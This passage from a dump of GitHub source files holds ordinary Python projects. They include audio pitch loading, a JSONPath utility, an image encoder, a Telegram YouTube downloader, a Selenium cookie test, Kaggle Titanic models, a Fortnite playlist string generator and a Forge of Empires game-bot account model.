names with instrument\n files = files[idx]\n\n final_list = len(files) * [None]\n for i in range(len(names)):\n flag = np.asarray(len(files) * [None]) # flag to mark if name of pitch/mixture present in filename\n for j in range(len(files)):\n flag[j] = files[j].find(names[i])\n idx = np.where(flag != -1)[0] # choose only file name specific pitch/mixture\n final_list[i] = files[idx][0]\n\n return final_list\n\n\ndef load_traindata(path, inst, frames=-1, start=0):\n \"\"\"Load test data, that is, mixture and sources.\"\"\"\n names = ['_M60_', '_M64_', '_M67_']\n filenames = load_filenames(path=path, inst=inst, names=names)\n\n x, aux, fs = readaudio(fname=path + filenames[0], frames=frames, start=start)\n traindata = [readaudio(fname=path + filenames[i], frames=frames, start=start, scaled=True)[1]\n for i in range(len(filenames))]\n return x, traindata, fs, filenames\n\n\ndef load_testdata(path, inst, frames=-1, start=0):\n \"\"\"Load test data, that is, mixture and sources.\"\"\"\n names = ['mixture', '_C_', '_E_', '_G_']\n filenames = load_filenames(path=path, inst=inst, names=names)\n\n x, y, fs = readaudio(fname=path + filenames[0], frames=frames, start=start)\n sources = [readaudio(fname=path + filenames[i], frames=frames, start=start)[1] for i in range(1, len(filenames))]\n mix = sum(sources)\n return x, mix, sources, fs, filenames\n\n\ndef get_kernel_features(filenames, ytrain, maxh, fs):\n num_pitches = len(filenames)\n if0 = gpitch.find_ideal_f0(filenames) # ideal frequency for each pitch\n all = [gpitch.init_cparam(y=ytrain[i], fs=fs, maxh=maxh, ideal_f0=if0[i], scaled=False) for i in range(num_pitches)]\n freq_feat = num_pitches*[None]\n var_feat = num_pitches*[None]\n for i in range(num_pitches):\n freq_feat[i] = all[i][0].copy()\n var_feat[i] = all[i][1].copy()\n return all, freq_feat, var_feat\n","repo_name":"PabloAlvarado/ssgp","sub_path":"gpitch/srcs.py","file_name":"srcs.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"74062640411","text":"from __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Any, cast\n\nfrom jsonpath_ng import JSONPath as JsonPath\nfrom jsonpath_ng import parse\n\nfrom commanderbot.lib.responsive_exception import ResponsiveException\n\n__all__ = (\n \"JsonPath\",\n \"JsonPathOp\",\n \"parse_json_path_op\",\n \"parse_json_path\",\n \"query_json_path\",\n \"update_json_with_path\",\n)\n\n\nclass JsonPathOp(Enum):\n set = \"set\"\n merge = \"merge\"\n append = \"append\"\n prepend = \"prepend\"\n\n\ndef parse_json_path_op(op: str) -> JsonPathOp:\n try:\n return JsonPathOp[op]\n except:\n raise ResponsiveException(f\"No such operation: `{op}`\")\n\n\ndef parse_json_path(path: str) -> JsonPath:\n try:\n return cast(JsonPath, parse(path))\n except:\n raise ResponsiveException(f\"Malformed JSON path: `{path}`\")\n\n\ndef query_json_path(target: Any, path: JsonPath) -> Any:\n nodes = list(path.find(target))\n if not nodes:\n raise ResponsiveException(f\"No such value: `{path}`\")\n if len(nodes) == 1:\n return nodes[0].value\n values = [node.value for node in nodes]\n return values\n\n\ndef update_json_with_path(target: Any, path: JsonPath, op: JsonPathOp, value: Any):\n if op == JsonPathOp.set:\n path.update_or_create(target, value)\n elif op == JsonPathOp.merge:\n if not isinstance(value, dict):\n raise ValueError(f\"Expected `dict`, got `{type(target).__name__}`\")\n for node in path.find_or_create(target):\n if isinstance(node.value, dict):\n node.value.update(value)\n elif op == JsonPathOp.append:\n for node in path.find_or_create(target):\n if isinstance(node.value, list):\n node.value.append(value)\n elif op == JsonPathOp.prepend:\n for node in path.find_or_create(target):\n if isinstance(node.value, list):\n node.value.insert(0, value)\n else:\n raise ResponsiveException(f\"Unsupported operation: `{op.value}`\")\n","repo_name":"CommanderBot-Dev/commanderbot-py","sub_path":"commanderbot/lib/utils/json_path.py","file_name":"json_path.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"32158506751","text":"import torch\nimport timm\n\nclass BaseEncoder(torch.nn.Module):\n def __init__(self,encoder_name,subtype,aux_hog):\n super().__init__()\n \n if aux_hog:\n in_channel = 4\n else:\n in_channel = 3\n self.aux_hog = aux_hog\n \n if encoder_name is not None:\n self.encoder = timm.create_model('_'.join([encoder_name,subtype]), pretrained=True, features_only=True, in_chans=in_channel)\n self.out_channels = self.encoder.feature_info.channels()\n \n def HOG_descriptor(self,img,ks):\n if ks == 2:\n hk = torch.tensor([1.,-1.],device=img.device)[None,None,:,None].tile(3,1,1,1)\n vk = torch.tensor([-1.,1.],device=img.device)[None,None,None,:].tile(3,1,1,1)\n else:\n hk = torch.tensor([1.,0.,-1.],device=img.device)[None,None,:,None].tile(3,1,1,1)\n vk = torch.tensor([-1.,0.,1.],device=img.device)[None,None,None,:].tile(3,1,1,1)\n \n vd_image = torch.amax(torch.nn.functional.conv2d(img,vk,padding='same',groups=3),dim=1,keepdim=True)\n hd_image = torch.amax(torch.nn.functional.conv2d(img,hk,padding='same',groups=3),dim=1,keepdim=True)\n mag_image = torch.sqrt(vd_image**2+hd_image**2)\n return mag_image\n \n def HOG_max_min_norm(self,x):\n max_v = torch.amax(x,dim=[2,3],keepdim=True)\n min_v = torch.amin(x,dim=[2,3],keepdim=True)\n x = (x-min_v)/(max_v-min_v)\n return x\n \n def forward(self,x):\n if self.aux_hog:\n hog = torch.maximum(self.HOG_descriptor(x,2),self.HOG_descriptor(x,3)) ** 0.5\n hog = self.HOG_max_min_norm(hog)\n x = torch.concat([x,hog],dim=1)\n fms = self.encoder(x)\n return fms","repo_name":"you-ming-hu/Golfer_Motion_Tracking","sub_path":"DL_approach/implementation/core/model/encoders/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16961881856","text":"from asyncio import get_event_loop\nfrom os import path, makedirs, getcwd, remove\nfrom tempfile import NamedTemporaryFile\n\n\nfrom pyrogram import (Client, ContinuePropagation, filters)\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, InputMediaAudio, InputMediaVideo, CallbackQuery\n\nfrom helper.ffmfunc import duration\nfrom helper.ytdlfunc import downloadvideocli, downloadaudiocli\nfrom PIL.Image import open\nfrom hachoir.metadata import extractMetadata\nfrom hachoir.parser import createParser\nfrom utils.database.models import Youtube_videos\n\n\n@Client.on_callback_query()\nasync def catch_youtube_dldata(c, q: CallbackQuery):\n cb_data = q.data.strip()\n media_type = cb_data.split(\"||\")[1]\n video_id = cb_data.split(\"||\")[-1]\n format_id = cb_data.split(\"||\")[-2]\n \n thumb_image = q.message.photo.file_id\n video = await Youtube_videos.filter(id=int(video_id)).first()\n\n tf = NamedTemporaryFile(prefix=\"media_\", suffix=\".%(ext)s\")\n filepath = tf.name.replace('/tmp/', '')\n\n yturl = video.video_url\n\n audio_command = [\n \"youtube-dl\",\n \"-c\",\n \"--prefer-ffmpeg\",\n \"--extract-audio\",\n \"--audio-format\", \"mp3\",\n \"--audio-quality\", \"bestaudio\",\n \"-o\", filepath,\n yturl,\n\n ]\n\n video_command = [\n \"youtube-dl\",\n '-c',\n '-k',\n \"-f\", f\"{format_id}\",\n \"--hls-prefer-ffmpeg\", yturl,\n \"-o\", filepath\n ]\n\n video_command.append(\"--no-warnings\")\n video_command.append(\"--restrict-filenames\")\n\n \n\n med = None\n if media_type == \"audio\":\n filename = await downloadaudiocli(audio_command)\n med = InputMediaAudio(\n media=filename,\n thumb=thumb_image,\n caption=path.basename(filename),\n title=path.basename(filename)\n )\n\n if media_type == \"video\":\n filename = await downloadvideocli(video_command, filepath)\n # dur = round((await duration(filename)))\n if filename:\n print(filename)\n med = InputMediaVideo(\n media=filename,\n # duration=dur,\n thumb=thumb_image,\n caption=path.basename(filename),\n supports_streaming=True\n )\n\n if med:\n await send_file(c, q, med, filename)\n else:\n print(\"med not found\")\n\n\nasync def send_file(c, q, med, filename):\n try:\n await q.edit_message_reply_markup(\n InlineKeyboardMarkup([[InlineKeyboardButton(\"Uploading...\", callback_data=\"down\")]]))\n await c.send_chat_action(chat_id=q.message.chat.id, action=\"upload_video\")\n await q.edit_message_media(media=med)\n except Exception as e:\n print(e)\n await q.edit_message_text(e)\n finally:\n try:\n remove(filename)\n except:\n pass\n","repo_name":"tilonuz99/Youtube-Downloader-Bot","sub_path":"old_videodownloader/plugins/youtube_callback_data.py","file_name":"youtube_callback_data.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"29743596906","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n'''\ncreated on 2019-6-2\n@author:Jayce Gao\nproject:\n'''\nimport json\nfrom time import sleep\nfrom typing import List, Dict\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass TestWeChat():\n def setup(self):\n # chrome启动时属性的类,复用浏览器\n # 声明一个变量,设置为chromeoptions\n c_options = webdriver.ChromeOptions()\n # 设置debug模式相同的端口号\n c_options.debugger_address = \"127.0.0.1:9222\"\n self.driver = webdriver.Chrome()\n self.driver.get(\"https://work.weixin.qq.com/\")\n self.driver.find_element(By.XPATH, '//*[@id=\"indexTop\"]/div[2]/aside/a[1]')\n\n def teardown(self):\n self.driver.quit()\n\n def test_wechat(self):\n # self.driver.get(\"https://home.testing-studio.com\")\n '''\n self.driver.find_element(By.CSS_SELECTOR, \".index_service_cnt_item_title\").click()\n sleep(3)\n '''\n # sleep(15)\n # cookies = self.driver.get_cookies()\n # # 写入cookies\n # with open(\"cookies.txt\", \"w\") as f:\n # json.dump(cookies, f)\n\n # 读取cookies\n with open(\"cookies.txt\", \"r\") as f:\n cookies: List[Dict] = json.load(f)\n for cookie in cookies:\n if \"expiry\" in cookie.keys():\n cookie.pop(\"expiry\")\n self.driver.add_cookie(cookie)\n sleep(3)\n","repo_name":"Jaycegao/hogwarts","sub_path":"企业微信实战/main/test_wechat.py","file_name":"test_wechat.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16702000781","text":"from causallearn.utils.cit import CIT\nimport pandas as pd, numpy as np\n\ndef KCIT(X, Y, Z, **kargs):\n X, Y, Z = map(lambda x: (x - np.mean(x)) / np.std(x), (X, Y, Z))\n data = np.column_stack((X, Y, Z))\n dz = Z.shape[1]\n kci = CIT(method='kci', data=data)\n p_value = kci(0, 1, list(range(2, 2 + dz)))\n return p_value","repo_name":"baosws/DINE","sub_path":"src/methods/KCIT.py","file_name":"KCIT.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"17863203839","text":"# logn for update\ndef update(mode, val, i, left, right, tree, index):\n if i < left or i > right:\n return\n if left == right:\n if mode == \"S\":\n tree[index] = (-1)**i * val\n else:\n tree[index] = (-1)**i * val * (i+1)\n return\n mid = left + (right-left)//2\n update(mode, val, i, left, mid, tree, 2*index+1)\n update(mode, val, i, mid+1, right, tree, 2*index+2)\n tree[index] = tree[2*index+1] + tree[2*index+2]\n\n\ndef build_util(mode, tree, ss, se, arr, si):\n if ss == se:\n if mode == \"S\":\n tree[si] = (-1)**ss * arr[ss]\n else:\n tree[si] = (-1)**ss * arr[ss] * (ss+1)\n return\n mid = ss + (se-ss)//2\n build_util(mode, tree, ss, mid, arr, 2*si+1)\n build_util(mode, tree, mid+1, se, arr, 2*si+2)\n tree[si] = tree[2*si+1] + tree[2*si+2]\n\n\n# O(n) to build\ndef build(arr, N, mode):\n tree = [0] * (2*N-1)\n build_util(mode, tree, 0, N-1, arr, 0)\n return tree\n\n\ndef query_util(tree, qs, qe, ss, se, si):\n if qs > se or qe < ss:\n return 0\n if qs <= ss and qe >= se:\n return tree[si]\n mid = ss + (se-ss)//2\n left = query_util(tree, qs, qe, ss, mid, 2*si+1)\n right = query_util(tree, qs, qe, mid+1, se, 2*si+2)\n return left+right\n\n\ndef query(tree1, tree2, start, end, N):\n # (-1)^start * (tree2[start, end] - tree1[start, end] * start)\n val2 = query_util(tree2, start, end, 0, N-1, 0)\n val1 = query_util(tree1, start, end, 0, N-1, 0)\n return (-1)**start * (val2 - val1 * start)\n\n\ndef solve():\n N, Q = map(int, input().split())\n candies = [int(c) for c in input().split() ]\n # construct a segment tree (-1)^i A(i)\n tree1 = build(candies, N, \"S\")\n # construct a segment tree (-1)^i A(i)*i\n tree2 = build(candies, N, \"M\")\n ans = 0\n for i in range(Q):\n q, a, b = input().split()\n a, b = int(a), int(b)\n if q == \"Q\":\n ans += query(tree1, tree2, a-1, b-1, N)\n elif q == \"U\":\n update(\"S\", b, a-1, 0, N-1, tree1, 0)\n update(\"M\", b, a-1, 0, N-1, tree2, 0)\n return ans\n\nT = int(input())\nfor c in range(T):\n print(\"Case #{}: {}\".format(c+1, solve()))\n\n\n\n","repo_name":"anh072/kickstart","sub_path":"2020/C/candies.py","file_name":"candies.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8184148147","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn import tree, linear_model, model_selection, preprocessing\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nimport sklearn\nsns.set()\n\ntrain = pd.read_csv('train.csv')\ntest = pd.read_csv('test.csv')\n\n# Put the two dataset together to efficiently numerize the string values\ntrain_data_set = [train, test]\n\n# Set the option to show all columns in the dataframe of the Python IDE console\n#pd.set_option('display.expand_frame_repr', False)\npd.options.display.width = 0\npd.set_option('display.max_rows', 800)\n\n\n# The following method is used to 'clean' the data where strings are converted to integer and Nan are filled.\nfor dataset in train_data_set:\n # changes male gender to 0 and female gender to 1\n dataset.loc[dataset['Sex'] == 'male', 'Sex'] = 0\n dataset.loc[dataset['Sex'] == 'female', 'Sex'] = 1\n\n # fills Nan value to S and changes the string values to 0, 1, 2 respectively\n dataset['Embarked'] = dataset['Embarked'].fillna('S')\n dataset.loc[dataset['Embarked'] == 'S', 'Embarked'] = 0\n dataset.loc[dataset['Embarked'] == 'C', 'Embarked'] = 1\n dataset.loc[dataset['Embarked'] == 'Q', 'Embarked'] = 2\n\n # instead of removing this 'Name' column, i have changed the title of Mr, Miss, Mrs, etc to various numbers 0, 1, 2, 3 respectively\n dataset['Title'] = dataset['Name'].str.extract('([A-Za-z]+)\\.', expand=False)\n title_mapping = {'Mr': 0, 'Miss': 1, 'Mrs': 2, 'Master': 3, 'Dr': 3, 'Rev': 3, 'Col': 3, 'Mlle': 3, 'Major': 3, 'Capt': 3, 'Jonkheer': 3, 'Ms': 3, 'Lady': 3, 'Sir': 3, 'Countess': 3, 'Mme': 3, 'Don': 3, 'Dona': 3}\n dataset['Title'] = dataset['Title'].map(title_mapping)\n\n # fills the Nan value of age to the median value of the various 'titles'\n dataset['Age'].fillna(dataset.groupby('Title')['Age'].transform('median'), inplace=True)\n dataset['Age'] = preprocessing.scale(dataset['Age'])\n\n # fills the Nan value of Fare to the median value based on their Pclass\n dataset['Fare'].fillna(dataset.groupby('Pclass')['Fare'].transform('median'), inplace=True)\n dataset['Fare'] = preprocessing.scale(dataset['Fare'])\n\n # Drops the 'Name' column\n dataset.drop('Name', axis = 1, inplace= True)\n\n # Drops the 'Ticket' column\n dataset.drop('Ticket', axis = 1, inplace=True)\n\n # Drops the 'Cabin' column\n #dataset.drop('Cabin', axis = 1, inplace=True)\n dataset['Cabin'] = dataset['Cabin'].str[:1]\n cabin_mapping = {'A': 0, 'B': 0.4, 'C': 0.8, 'D': 1.2, 'E': 1.6, 'F': 2.0, 'G': 2.4, 'H':2.8}\n dataset['Cabin'] = dataset['Cabin'].map(cabin_mapping)\n dataset['Cabin'].fillna(dataset.groupby('Pclass')['Cabin'].transform('median'), inplace=True)\n\n# print(train.head(100))\n\"\"\"\n# Linear Regression\npredict = 'Survived'\nX = train.drop(['Survived'], 1).values\ny = train[predict].values\n\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size=0.1)\nlinear = linear_model.LinearRegression()\n\nlinear.fit(x_train, y_train)\nacc = linear.score(x_test, y_test)\n\nprint(acc)\n\npredictions = linear.predict(x_test)\n\nfor x in range(len(predictions)):\n print(predictions[x], x_test[x], y_test[x])\n\"\"\"\n\n\ntarget = train['Survived'].values\nfeatures = train[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Embarked', 'Title']].values\n\n# Logistic Regression\ndef logistic_regression(features, target):\n logistic = linear_model.LogisticRegression()\n logistic.fit(features, target)\n acc1 = logistic.score(features, target)\n print('Logistic Regression:', acc1)\n\n scores1 = model_selection.cross_val_score(logistic, features, target, scoring='accuracy', cv=10)\n print(scores1.mean())\n\n return logistic\n\n# Logistic Regression with polynomial n=2\n\"\"\"\npoly = preprocessing.PolynomialFeatures(degree=2)\nfeatures_ = poly.fit_transform(features)\nlogistic2 = linear_model.LogisticRegression(C=10, max_iter=1000)\nlogistic2.fit(features_, target)\nacc12 = logistic2.score(features_, target)\nprint('Logistic Regression with Poly(2):', acc12)\n\nscores1 = model_selection.cross_val_score(logistic2, features_, target, scoring='accuracy', cv=10)\nprint(scores1.mean())\n\"\"\"\n\n# Decision Tree\ndef decision_tree(features, target):\n decision = tree.DecisionTreeClassifier()\n decision.fit(features, target)\n acc2 = decision.score(features, target)\n print('Decision Tree:', acc2)\n\n scores2 = model_selection.cross_val_score(decision, features, target, scoring='accuracy', cv=10)\n print(scores2.mean())\n return decision\n# Random Forest\ndef random_forest(features, target):\n randomForest = RandomForestClassifier(n_estimators=12)\n randomForest.fit(features, target)\n acc3 = randomForest.score(features, target)\n print('Random Forest:', acc3)\n\n scores3 = model_selection.cross_val_score(randomForest, features, target, scoring='accuracy', cv=10)\n print(scores3.mean())\n return randomForest\n# Support Vector Machine\ndef svm(features, target):\n clf = SVC()\n clf.fit(features, target)\n acc4 = clf.score(features, target)\n print('SVM:', acc4)\n\n scores4 = model_selection.cross_val_score(clf, features, target, scoring='accuracy', cv=10)\n print(scores4.mean())\n return clf\n# KNN\ndef knn(features, target):\n knntest = KNeighborsClassifier(n_neighbors=13)\n knntest.fit(features, target)\n acc5 = knntest.score(features, target)\n print('KNN:', acc5)\n\n scores5 = model_selection.cross_val_score(knntest, features, target, scoring='accuracy', cv=10)\n print(scores5.mean())\n return knntest\n\nlogistic_regression(features, target)\ndecision_tree(features, target)\nrandom_forest(features, target)\nsvm(features, target)\nknn(features, target)\n\n#test_features = test[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Embarked', 'Title']].values\n#test_features_ = poly.fit_transform(test_features)\n#predict = logistic2.predict(test_features_)\n\n\"\"\"\ndef final(prediction, test):\n submission = pd.DataFrame({\n 'PassengerId' : test['PassengerId'],\n 'Survived' : prediction\n })\n submission.to_csv('submission.csv', index=False)\n\"\"\"\n#final(predict, test)\n\n\n","repo_name":"wonheejo/Kaggle_Titanic","sub_path":"Titanic1.py","file_name":"Titanic1.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38591553070","text":"sum = 0\r\nfor x in range(20):\r\n a = float(input(' please enter a number : '))\r\n sum += a\r\n\r\n if(x == 0):\r\n min = a\r\n max= a\r\n else:\r\n if(a > max):\r\n max = a\r\n if(a < min):\r\n min = a\r\n \r\n\r\navg = sum / 20\r\nprint('avg =',avg,' min =' , min , ' max =' , max)\r\n\r\ninput()\r\n ","repo_name":"amirmohamad-ahmadi/python-course","sub_path":"sixth.py","file_name":"sixth.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74072148891","text":"## 숫자 문자열과 영단어 - 2021 카카오 채용연계형 인턴십 \n## https://school.programmers.co.kr/learn/courses/30/lessons/81301\n\ndef solution(s):\n answer = s\n # mydict : key - 영단어, value - 숫자\n mydict = {'zero' : '0', 'one' : '1', 'two' : '2', 'three' : '3', 'four' : '4', \n 'five' : '5', 'six' : '6', 'seven' : '7', 'eight' : '8', 'nine' : '9'}\n \n # s 안의 영단어(key = data[0])를 숫자(value = data[1])로 replace\n # replace()는 string에만 적용되므로, data[1]을 str로 cast\n for data in mydict.items():\n answer = answer.replace(data[0], data[1]) \n \n # answer는 string이므로 int로 cast\n return int(answer)\n \n","repo_name":"DongEon31/CodingTest_with_Python","sub_path":"LEVEL1/숫자 문자열과 영단어.py","file_name":"숫자 문자열과 영단어.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21004803904","text":"'''\nhttps://leetcode.com/problems/maximum-number-of-balloons/submissions/\n'''\nclass Solution:\n def maxNumberOfBalloons(self, text: str) -> int:\n d={'b':0,'a':0,'l':0,'o':0,'n':0}\n for i in text:\n if(i in d):\n d[i]+=1\n \n return(min(d['b'],d['a'],d['l']//2,d['o']//2,d['n']))\n \n \n \n \n \n \n ","repo_name":"killswitchh/Leetcode-Problems","sub_path":"Easy/maximum-number-of-balloons.py","file_name":"maximum-number-of-balloons.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"47382201382","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nimport argparse\n\nimport alphabet\n\nparser=argparse.ArgumentParser(description=\"adds text to images\")\n#about picture\nparser.add_argument(\"picture\", help=\"picture which needs the subtitles\", type=str)\nparser.add_argument(\"size\", help= \"percentage of the image, default 40\",type=int ,nargs='?',const=1,default=40)\n\n#about text\nparser.add_argument(\"x\",help=\"x position for text, default 351\",type=int,nargs='?',const=1,default=351)\nparser.add_argument(\"y\", help= \"y position for text, default 2\",type=int,nargs='?',const=1,default=2)\nparser.add_argument(\"text\",help=\"write for making subtitles\",type=str)\n\nargs=parser.parse_args()\n\nsentence=args.text\n\n\n\n\n#picture name\npic=args.picture\n\nscreen=cv2.imread(f\"{pic}\")\n\n#picture size\nscale_percent = args.size #40\nwidth = int(screen.shape[1] * scale_percent / 100)\nheight = int(screen.shape[0] * scale_percent / 100)\ndim = (width, height)\n \n#resized image\nscreen = cv2.resize(screen, dim)\n\n\"\"\"\n#just for white picture\n\n#that was the screen size\nr,c = 360, 720\n\nscreen=[[0 for col in range(c)] for rows in range(r)] \nfor i in range(r):\n for j in range(c):\n screen[i][j]=[255,255,255]\n\"\"\"\n \n#writing every letter side by side from text\n\ndef word_picture(sentence):\n pics=[]\n #if there is white space between words add empty\n for word in sentence: \n if word.isspace():\n new_word=alphabet.empty\n each_word=alphabet.word_coloring(new_word)\n each_W=np.array(each_word,dtype=np.uint8)\n pics += [each_W]\n \n # letters \n else: \n\n i=alphabet.letters_list.index(f\"{word}\")\n new_word=alphabet.letters[i]\n each_word=alphabet.word_coloring(new_word)\n each_W=np.array(each_word,dtype=np.uint8)\n pics += [each_W] #adding every letters' matrix value to the list\n return pics \n\n\neW = word_picture(sentence) \n\n#adding the text to the picture \nfor k in range(len(eW)):\n for i in range(9):\n for j in range(9): \n screen[args.x +i][ args.y +9*k +j] = eW[k][i][j] \n pass\n\n#positons of the text arg.x=351 args.y=2\n#matrix to image\nscreen_array=np.array(screen,dtype=np.uint8)\ncv2.imshow('white', screen_array)\n\ncv2.waitKey(0) # waits until a key is pressed\ncv2.destroyAllWindows() # destroys the window showing image\n","repo_name":"devran1/adding_subtitles","sub_path":"add-text.py","file_name":"add-text.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71292873371","text":"import requests\nimport random\nimport time\n\n\n# Playlist Cloudstorage String Generator - Made by Fevers#3474 #\n\n\n#----------#\nGrabByID = 'True'\n#----------#\n\nGrabByID = GrabByID.title()\n\nprint('Do you want to grab a playlist name (1) or a playlist ID (2)?')\ninput1 = input('>> ')\ninput1 = input1.title()\nif input1 == '1':\n GrabByID = 'False'\nelif input1 == '2':\n GrabByID = 'True'\nelse:\n print('Incorrect answer, defaulted to False.')\n GrabByID = 'False'\n\nif GrabByID != 'True':\n print('\\nWhat playlist name do you want to grab?')\nelse:\n print('\\nWhat playlist ID do you want to grab?')\nask = input('>> ')\nask = ask.title()\n\nfile1 = open('ids.txt', 'w')\nfile1.writelines('')\nfile1.close()\n\nresponse = requests.get('https://fortnite-api.com/v1/playlists')\n\nprint(f'\\nAll IDs for the {ask} LTM:\\n')\n\nlines = ''\ntry:\n if GrabByID != 'True':\n for i in response.json()['data']:\n if ask == i['name']:\n id = i['id']\n lines += f'{id}\\n'\n print(f'- {id}')\n else:\n lines += f'{ask}\\n'\n print(f'- {ask}')\nexcept:\n print('Could not find ltm')\n time.sleep(2)\n exit()\n\nfile1 = open('ids.txt', 'w')\nfile1.writelines(lines)\nfile1.close()\n\nfile1 = open('ids.txt', 'r')\nlines = file1.readlines()\n \nnumber = random.randint(1, 999)\nstrings = ''\n\nfile1 = open('ids.txt', 'w')\nfile1.writelines(lines)\nfile1.writelines('\\nStrings:\\n\\n')\nfor line in lines:\n #print(f'{line}'.format(line.strip()))\n number = random.randint(1, 999)\n category = random.randint(0, 2)\n if GrabByID != 'True':\n print(f'\\n+FrontEndPlaylistData=(PlaylistName={line}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))')\n strings += f'+FrontEndPlaylistData=(PlaylistName={line}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))\\n'\n else:\n print(f'\\n+FrontEndPlaylistData=(PlaylistName={ask}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))')\n strings += f'+FrontEndPlaylistData=(PlaylistName={ask}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))\\n'\n file1.writelines(strings)\nfile1.close()\n\nprint('\\n\\nWrote files to ids.txt. Copy all of the id strings and place them in DefaultGame.ini to add it to your LTM list. \\nMake sure the string is one line.')\ntime.sleep(10)","repo_name":"CyberDomLeaks/BetterFN","sub_path":"src/cloudstorage/playlist_generator.py","file_name":"playlist_generator.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9621837388","text":"\n\"\"\"\n\"\"\"\n\n# Native\nimport time\nimport pprint\nfrom collections import OrderedDict\nimport json\n\n# 3rd-Party\nfrom sqlalchemy import Table, Column, ForeignKey, Integer, String, Boolean, Float\nfrom sqlalchemy.orm import relationship, backref\n\nimport pydash\n\n#\nfrom foe.request import Request\nfrom foe.models.model import Model\nfrom foe.models.city import City\nfrom foe.models.player import Player\nfrom foe.models.tavern import Tavern\nfrom foe.models.resources import Resources\nfrom foe.models.hiddenReward import HiddenReward\n\n\nclass Account(Model):\n \"\"\"\n \"\"\"\n\n REQUEST_CLASS = \"StartupService\"\n\n __tablename__ = 'account'\n\n # Attributes\n # ---------------------------------------------------------\n\n player_id = Column(Integer, primary_key=True, default=0)\n\n id = Column(String, default=0)\n\n user_name = Column(String, default='', unique=True)\n\n # Back-refs\n # ---------------------------------------------------------\n\n # Containers\n # ---------------------------------------------------------\n\n city = relationship(City, backref=backref('account', uselist=False), uselist=False)\n\n players = relationship(Player, backref=backref('account', uselist=False))\n\n taverns = relationship(Tavern, backref=backref('account', uselist=False))\n\n resources = relationship(Resources, backref=backref('account', uselist=False), uselist=False)\n\n hiddenRewards = relationship(HiddenReward, backref=backref('account', uselist=False))\n\n def __repr__(self):\n \"\"\"\n \"\"\"\n\n return \"Account %s (%s)\" % (self.player_id, self.user_name)\n\n def fetch(self):\n \"\"\"\n Does a HTTP request to get the start up blob for the city, then populates the models\n \"\"\"\n\n print(\"%s fetching...\" % (self))\n\n timer = time.time()\n\n data = self.request('getData', [])\n\n account = Request.service(data, 'StartupService')\n account['taverns'] = Request.method(data, 'getOtherTavernStates')\n account['resources'] = Request.method(data, 'getPlayerResources')['resources']\n # account['hiddenRewards'] = Request.method(data, 'getOverview')['hiddenRewards']\n\n self.update(**account)\n\n print(\"%s fetched in %.2fs\" % (self, time.time() - timer))\n\n return self\n\n def updateFromResponse(self, data):\n \"\"\"\n \"\"\"\n\n if not data:\n return self\n\n resources = Request.method(data, 'getPlayerResources')['resources']\n\n if resources:\n self.resources.update(**resources)\n\n return self\n\n def populate(self, *args, **kwargs):\n \"\"\"\n \"\"\"\n\n user = kwargs.pop('user_data')\n social = kwargs.pop('socialbar_list')\n taverns = kwargs.pop('taverns')\n city = kwargs.pop('city_map')\n resources = kwargs.pop('resources')\n # hiddenRewards = kwargs.pop('hiddenRewards')\n\n for key in ['player_id', 'user_name']:\n setattr(self, key, user[key])\n\n for key in list(kwargs.keys()):\n kwargs.pop(key)\n\n # City\n\n if not self.city:\n self.city = City(account=self)\n\n self.city.update(**city)\n\n # Players\n\n for raw_player in social:\n\n player = self.session.query(Player).filter_by(player_id=raw_player['player_id']).first()\n if not player:\n player = Player(account=self)\n\n player.update(**raw_player)\n\n # Taverns\n\n for raw_tavern in taverns:\n\n tavern = self.session.query(Tavern).filter_by(ownerId=raw_tavern['ownerId']).first()\n if not tavern:\n tavern = Tavern(account=self)\n\n tavern.update(**raw_tavern)\n\n # Resources\n\n if not self.resources:\n self.resources = Resources(account=self)\n\n 